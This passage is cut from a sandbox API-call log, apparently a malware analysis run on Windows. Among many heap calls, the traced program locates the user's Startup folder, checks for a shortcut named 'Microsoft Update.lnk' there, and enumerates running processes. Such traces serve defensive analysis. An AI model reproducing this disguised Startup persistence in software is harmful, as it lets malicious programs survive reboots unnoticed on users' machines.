hHeap=0x25c0000) returned 1 [0294.176] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0294.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0294.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0294.176] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0294.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0294.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0294.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0294.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0294.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0294.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0294.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0294.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0294.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0294.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0294.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0294.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0294.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0294.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0294.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0294.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0294.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0294.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0294.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0294.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0294.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0294.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0294.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0294.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0294.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0294.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0294.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0294.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0294.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0294.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0294.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0294.178] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0294.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0294.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0294.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0294.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0294.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0294.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0294.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0294.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0294.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0294.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0294.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0294.179] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0294.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0294.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0294.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0294.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0294.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0294.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0294.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0294.180] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0294.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0294.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0294.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0294.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0294.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0294.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0294.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0294.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0294.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0294.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0294.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0294.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0294.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0294.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0294.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0294.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0294.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0294.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0294.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0294.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0294.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0294.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0294.181] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0294.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0294.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0294.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0294.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0294.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0294.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0294.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0294.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0294.182] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0294.182] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0294.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0294.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0294.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0294.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0294.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0294.182] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0294.184] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.185] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0294.186] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0294.187] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0294.188] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0294.189] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0294.190] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0294.191] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0294.191] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0294.192] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0294.193] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.194] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.195] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.196] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.196] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.197] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0294.198] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.199] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.200] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0294.211] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0294.212] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0294.213] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0294.213] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.214] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0294.215] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0294.216] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0294.217] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0294.218] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0294.218] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0294.219] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0294.220] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0294.221] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0294.222] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0294.223] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0294.224] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0294.224] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0294.226] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0294.227] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0294.228] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0294.229] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0294.230] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, 